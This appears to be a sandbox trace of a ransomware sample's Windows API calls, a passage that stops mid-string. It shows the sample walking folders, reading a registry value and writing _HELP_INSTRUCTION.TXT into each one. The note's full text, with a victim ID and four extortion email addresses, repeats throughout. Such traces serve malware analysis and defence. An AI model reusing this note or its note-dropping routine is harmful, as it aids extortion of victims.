10 [0032.409] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x368) returned 0x0 [0032.409] RegQueryValueExW (in: hKey=0x368, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3dd76b8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3dd76b8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0032.409] RegCloseKey (hKey=0x368) returned 0x0 [0032.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0032.409] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0032.409] CreateFileW (lpFileName="C:\\Config.Msi\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\config.msi\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.409] CreateFileW (lpFileName="C:\\Config.Msi\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\config.msi\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0032.409] WriteFile (in: hFile=0x368, lpBuffer=0x17c61c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17c614, lpOverlapped=0x0 | out: lpBuffer=0x17c61c*, lpNumberOfBytesWritten=0x17c614*=0x2c4, lpOverlapped=0x0) returned 1 [0032.410] CloseHandle (hObject=0x368) returned 1 [0032.410] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.410] PathFindFileNameW (pszPath="C:\\Config.Msi") returned="Config.Msi" [0032.410] lstrcpyW (in: lpString1=0x17e824, lpString2="Config.Msi" | out: lpString1="Config.Msi") returned="Config.Msi" [0032.411] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0032.411] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0032.411] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.411] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0032.411] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.411] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0 [0032.411] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.411] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 0 [0032.411] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.411] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0032.411] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0032.411] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0032.411] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0032.411] lstrcatW (in: lpString1="C:\\", lpString2="Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0032.411] SetErrorMode (uMode=0x1) returned 0x1 [0032.411] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0032.411] lstrcatW (in: lpString1="C:\\Documents and Settings", lpString2="\\" | out: lpString1="C:\\Documents and Settings\\") returned="C:\\Documents and Settings\\" [0032.411] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Documents and Settings\\" | out: lpString1="C:\\Documents and Settings\\") returned="C:\\Documents and Settings\\" [0032.412] lstrcatW (in: lpString1="C:\\Documents and Settings\\", lpString2="*.*" | out: lpString1="C:\\Documents and Settings\\*.*") returned="C:\\Documents and Settings\\*.*" [0032.412] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0032.412] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0032.412] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0032.412] lstrcatW (in: lpString1="C:\\Documents and Settings", lpString2="\\*.*" | out: lpString1="C:\\Documents and Settings\\*.*") returned="C:\\Documents and Settings\\*.*" [0032.412] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="Desktop") returned 0x0 [0032.412] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="DESKTOP") returned 0x0 [0032.412] SetErrorMode (uMode=0x1) returned 0x1 [0032.412] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Documents and Settings\\_HELP_INSTRUCTION.TXT") returned 47 [0032.412] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0032.412] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0032.412] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x364) returned 0x0 [0032.412] RegQueryValueExW (in: hKey=0x364, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3dd78e8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3dd78e8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0032.413] RegCloseKey (hKey=0x364) returned 0x0 [0032.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0032.413] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0032.413] CreateFileW (lpFileName="C:\\Documents and Settings\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\documents and settings\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.413] CreateFileW (lpFileName="C:\\Documents and Settings\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\documents and settings\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0032.413] WriteFile (in: hFile=0x364, lpBuffer=0x17c61c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17c614, lpOverlapped=0x0 | out: lpBuffer=0x17c61c*, lpNumberOfBytesWritten=0x17c614*=0x2c4, lpOverlapped=0x0) returned 1 [0032.414] CloseHandle (hObject=0x364) returned 1 [0032.414] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0032.414] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0032.414] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.414] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.414] lstrcmpW (lpString1="MSOCache", lpString2="..") returned 1 [0032.414] lstrcmpW (lpString1="MSOCache", lpString2=".") returned 1 [0032.414] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0032.414] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0032.414] lstrcatW (in: lpString1="C:\\", lpString2="MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache" [0032.414] SetErrorMode (uMode=0x1) returned 0x1 [0032.414] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache" [0032.414] lstrcatW (in: lpString1="C:\\MSOCache", lpString2="\\" | out: lpString1="C:\\MSOCache\\") returned="C:\\MSOCache\\" [0032.414] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\MSOCache\\" | out: lpString1="C:\\MSOCache\\") returned="C:\\MSOCache\\" [0032.415] lstrcatW (in: lpString1="C:\\MSOCache\\", lpString2="*.*" | out: lpString1="C:\\MSOCache\\*.*") returned="C:\\MSOCache\\*.*" [0032.415] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.415] PathFindFileNameW (pszPath="C:\\MSOCache") returned="MSOCache" [0032.415] lstrcpyW (in: lpString1=0x17e824, lpString2="MSOCache" | out: lpString1="MSOCache") returned="MSOCache" [0032.415] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.415] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.415] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0 [0032.415] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.415] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 0 [0032.415] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache" [0032.415] lstrcatW (in: lpString1="C:\\MSOCache", lpString2="\\*.*" | out: lpString1="C:\\MSOCache\\*.*") returned="C:\\MSOCache\\*.*" [0032.415] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="Desktop") returned 0x0 [0032.415] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="DESKTOP") returned 0x0 [0032.415] SetErrorMode (uMode=0x1) returned 0x1 [0032.415] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\MSOCache\\_HELP_INSTRUCTION.TXT") returned 33 [0032.415] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0032.416] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0032.416] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x36c) returned 0x0 [0032.416] RegQueryValueExW (in: hKey=0x36c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3dd7b18, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3dd7b18*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0032.416] RegCloseKey (hKey=0x36c) returned 0x0 [0032.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0032.416] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0032.416] CreateFileW (lpFileName="C:\\MSOCache\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\msocache\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.416] CreateFileW (lpFileName="C:\\MSOCache\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\msocache\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x36c [0032.416] WriteFile (in: hFile=0x36c, lpBuffer=0x17c61c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17c614, lpOverlapped=0x0 | out: lpBuffer=0x17c61c*, lpNumberOfBytesWritten=0x17c614*=0x2c4, lpOverlapped=0x0) returned 1 [0032.417] CloseHandle (hObject=0x36c) returned 1 [0032.417] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.417] PathFindFileNameW (pszPath="C:\\MSOCache") returned="MSOCache" [0032.417] lstrcpyW (in: lpString1=0x17e824, lpString2="MSOCache" | out: lpString1="MSOCache") returned="MSOCache" [0032.417] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0032.417] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0032.417] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.418] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0032.418] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.418] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0032.418] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0032.418] lstrcpyW (in: lpString1=0x17f6b0, lpString2="C:\\MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache" [0032.418] lstrcatW (in: lpString1="C:\\MSOCache", lpString2="\\" | out: lpString1="C:\\MSOCache\\") returned="C:\\MSOCache\\" [0032.418] lstrcatW (in: lpString1="C:\\MSOCache\\", lpString2="All Users" | out: lpString1="C:\\MSOCache\\All Users") returned="C:\\MSOCache\\All Users" [0032.418] SetErrorMode (uMode=0x1) returned 0x1 [0032.418] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\MSOCache\\All Users" | out: lpString1="C:\\MSOCache\\All Users") returned="C:\\MSOCache\\All Users" [0032.418] lstrcatW (in: lpString1="C:\\MSOCache\\All Users", lpString2="\\" | out: lpString1="C:\\MSOCache\\All Users\\") returned="C:\\MSOCache\\All Users\\" [0032.418] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\MSOCache\\All Users\\" | out: lpString1="C:\\MSOCache\\All Users\\") returned="C:\\MSOCache\\All Users\\" [0032.418] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\", lpString2="*.*" | out: lpString1="C:\\MSOCache\\All Users\\*.*") returned="C:\\MSOCache\\All Users\\*.*" [0032.418] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3246b8 [0032.420] PathFindFileNameW (pszPath="C:\\MSOCache\\All Users") returned="All Users" [0032.420] lstrcpyW (in: lpString1=0x17d784, lpString2="All Users" | out: lpString1="All Users") returned="All Users" [0032.420] FindClose (in: hFindFile=0x3246b8 | out: hFindFile=0x3246b8) returned 1 [0032.420] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\MSOCache\\All Users" | out: lpString1="C:\\MSOCache\\All Users") returned="C:\\MSOCache\\All Users" [0032.420] lstrcatW (in: lpString1="C:\\MSOCache\\All Users", lpString2="\\*.*" | out: lpString1="C:\\MSOCache\\All Users\\*.*") returned="C:\\MSOCache\\All Users\\*.*" [0032.420] StrStrW (lpFirst="C:\\MSOCache\\All Users\\", lpSrch="Desktop") returned 0x0 [0032.420] StrStrW (lpFirst="C:\\MSOCache\\All Users\\", lpSrch="DESKTOP") returned 0x0 [0032.420] SetErrorMode (uMode=0x1) returned 0x1 [0032.420] wsprintfW (in: param_1=0x17d57c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\MSOCache\\All Users\\_HELP_INSTRUCTION.TXT") returned 43 [0032.420] GetUserNameW (in: lpBuffer=0x17b358, pcbBuffer=0x17b144 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17b144) returned 1 [0032.421] wsprintfW (in: param_1=0x17b150, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0032.421] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17b14c | out: phkResult=0x17b14c*=0x370) returned 0x0 [0032.421] RegQueryValueExW (in: hKey=0x370, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3dd7d48, lpcbData=0x17b148*=0x104 | out: lpType=0x0, lpData=0x3dd7d48*=0x65, lpcbData=0x17b148*=0x4a) returned 0x0 [0032.421] RegCloseKey (hKey=0x370) returned 0x0 [0032.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17c57c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0032.421] wsprintfW (in: param_1=0x17b57c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0032.421] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\msocache\\all users\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.424] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\msocache\\all users\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x370 [0032.424] WriteFile (in: hFile=0x370, lpBuffer=0x17b57c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17b574, lpOverlapped=0x0 | out: lpBuffer=0x17b57c*, lpNumberOfBytesWritten=0x17b574*=0x2c4, lpOverlapped=0x0) returned 1 [0032.425] CloseHandle (hObject=0x370) returned 1 [0032.425] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3246b8 [0032.425] PathFindFileNameW (pszPath="C:\\MSOCache\\All Users") returned="All Users" [0032.425] lstrcpyW (in: lpString1=0x17d784, lpString2="All Users" | out: lpString1="All Users") returned="All Users" [0032.425] FindClose (in: hFindFile=0x3246b8 | out: hFindFile=0x3246b8) returned 1 [0032.425] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.425] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0 [0032.425] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.425] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 0 [0032.425] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.425] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.425] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1 [0032.425] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1 [0032.425] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0032.425] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0032.425] lstrcatW (in: lpString1="C:\\", lpString2="PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs" [0032.425] SetErrorMode (uMode=0x1) returned 0x1 [0032.425] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs" [0032.425] lstrcatW (in: lpString1="C:\\PerfLogs", lpString2="\\" | out: lpString1="C:\\PerfLogs\\") returned="C:\\PerfLogs\\" [0032.425] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\PerfLogs\\" | out: lpString1="C:\\PerfLogs\\") returned="C:\\PerfLogs\\" [0032.425] lstrcatW (in: lpString1="C:\\PerfLogs\\", lpString2="*.*" | out: lpString1="C:\\PerfLogs\\*.*") returned="C:\\PerfLogs\\*.*" [0032.425] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.426] PathFindFileNameW (pszPath="C:\\PerfLogs") returned="PerfLogs" [0032.426] lstrcpyW (in: lpString1=0x17e824, lpString2="PerfLogs" | out: lpString1="PerfLogs") returned="PerfLogs" [0032.426] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.426] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.426] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0 [0032.426] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.426] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 0 [0032.426] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs" [0032.426] lstrcatW (in: lpString1="C:\\PerfLogs", lpString2="\\*.*" | out: lpString1="C:\\PerfLogs\\*.*") returned="C:\\PerfLogs\\*.*" [0032.426] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="Desktop") returned 0x0 [0032.426] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="DESKTOP") returned 0x0 [0032.426] SetErrorMode (uMode=0x1) returned 0x1 [0032.426] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\PerfLogs\\_HELP_INSTRUCTION.TXT") returned 33 [0032.426] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0032.426] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0032.426] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x374) returned 0x0 [0032.427] RegQueryValueExW (in: hKey=0x374, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3dd7f78, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3dd7f78*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0032.427] RegCloseKey (hKey=0x374) returned 0x0 [0032.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0032.427] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID 